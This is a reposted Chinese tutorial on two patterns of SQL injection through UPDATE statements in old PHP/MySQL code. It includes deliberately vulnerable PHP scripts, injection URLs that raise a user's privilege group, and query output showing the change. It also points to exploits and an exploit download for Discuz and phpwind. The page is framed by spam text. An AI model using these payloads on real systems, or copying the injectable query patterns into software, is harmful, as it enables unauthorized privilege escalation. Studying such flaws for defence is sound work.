91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

UPDATE注射的兩個模式是什么

發布時間:2021-10-18 17:51:29 來源:億速云 閱讀:141 作者:柒染 欄目:MySQL數據庫

今天就跟大家聊聊有關UPDATE注射的兩個模式是什么,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

  一.測試環境:

  OS: Windowsxp sp2

  php: php 4.3.10 (

  mysql 4.1.9

  apache 1.3.33 

  二.測試數據庫結構:

  ----start---

  -- 數據庫: `test`

  -- 

  -- --------------------------------------------------------

  -- 

  -- 表的結構 `userinfo`

  -- 

  CREATE TABLE `userinfo` (

  `groudid` varchar(12) NOT NULL default ’1’,

  `user` varchar(12) NOT NULL default ’heige’,

  `pass` varchar(122) NOT NULL default ’123456’

  ) ENGINE=MyISAM DEFAULT CHARSET=latin1;

  -- 

  -- 導出表中的數據 `userinfo`

  -- 

  INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);

  ------end-------

  三.測試模式:

  1,變量沒有帶’’或""[MOD1]

  <?php

  //test1.php Mod1

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("數據庫連接失敗");

  $sql = "update userinfo set pass=$p where user=’heige’";//<--$P沒有使用單引號

  $result = mysql_db_query($dbname, $sql);

  $userinfo = mysql_fetch_array($result);

  echo "

SQL Query:$sql

";

  ?>

  腳本里只是修改user=’heige’的pass,如果groudid表示用戶的權限等級,我們的目的就是通過構造$p 來達

  到修改groupid的目的:

  那么我們提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查詢: mysql> select * from userinfo;

  +---------+-------+--------+

  | groudid | user | pass  |

  +---------+-------+--------+

  | 1    | heige | 123456 |

  +---------+-------+--------+

  1 row in set (0.01 sec)

  用戶heige的groudid又2改為1了 :)

  所以我們可以得到沒有’’或"" update的注射是可以成功的,這個就是我們的模式1。

  2,變量帶’’或""[MOD2]

  ?php

  //test2.php

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("數據庫連接失敗");

  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號

  $result = mysql_db_query($dbname, $sql);

  $userinfo = mysql_fetch_array($result);

  echo "

SQL Query:$sql

";

  ?>

  為了關閉’我們構造$p應該為123456’,groudid=’2 提交:

  http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情況下’變成了’

  提交的語句變成:SQL Query:update userinfo set pass=’123456’,groudid=’1’ where user=’heige’

  mysql查詢:

mysql> select * from userinfo;

  +---------+-------+--------------------+

  | groudid | user | pass        |

  +---------+-------+--------------------+

  | 2    | heige | 123456’,groudid=’1 |

  +---------+-------+--------------------+

  1 row in set (0.00 sec)

  groudid并沒有被修改。那么在變量被’’或""時 就完全沒有被注射呢?不是 下面我們看模式2: <?php

  //test3.php Mod2

  $servername = "localhost";

  $dbusername = "root";

  $dbpassword = "";

  $dbname = "test";

  mysql_connect($servername,$dbusername,$dbpassword) or die ("數據庫連接失敗");

  $sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用單引號

  $result = mysql_db_query($dbname, $sql);

  mysql_fetch_array($result);  //$p的數據寫入數據庫

  $sql= "select pass from userinfo where user=’heige’"; 

  $result = mysql_db_query($dbname, $sql);

  $userinfo=mysql_fetch_array($result); 

  echo $userinfo[0]; //把pass查詢輸出給$userinfo[0]

  $sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";

  $result = mysql_db_query($dbname, $sql);

  mysql_fetch_array($result); //把$userinfo[0] 再次update

  ?>

  我們測試下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1

  回mysql查詢下 : mysql> select * from userinfo;

  +---------+-------+--------+

  | groudid | user | pass  |

  +---------+-------+--------+

  | 1    | heige | 123456 |

  +---------+-------+--------+

  1 row in set (0.00 sec)

  HaHa~~ 成功注射 修改groudid為1。 這個就是我們的模式2了,簡單的描敘如下:

  update--&gtselect--&gtupdate

  四.實際模式

  模式1:Discuz 2.0/2.2 register.php 注射 

  漏洞分析:http://4ngel.net/article/41.htm

  Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm

  模式2:phpwind 2.0.2和3.31e 權限提升漏洞 

    漏洞分析:

  update (profile.php 注射變量為$proicon update語句里為,icon=’$userdb[icon]’)

  |

  v

  select (jop.php)

  |

  v

  updtate (jop.php)

  Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe  

看完上述內容,你們對UPDATE注射的兩個模式是什么有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

南澳县| 旬邑县| 喀喇沁旗| 焦作市| 乐昌市| 勃利县| 泗水县| 太和县| 雷波县| 黄浦区| 哈尔滨市| 治多县| 清新县| 宝山区| 伊吾县| 丹巴县| 黔南| 关岭| 塘沽区| 闵行区| 常山县| 罗山县| 定安县| 布尔津县| 庄浪县| 德格县| 安宁市| 新邵县| 宝丰县| 遵化市| 台东县| 梁平县| 许昌县| 五原县| 图木舒克市| 邓州市| 页游| 五河县| 高州市| 洛阳市| 贺兰县|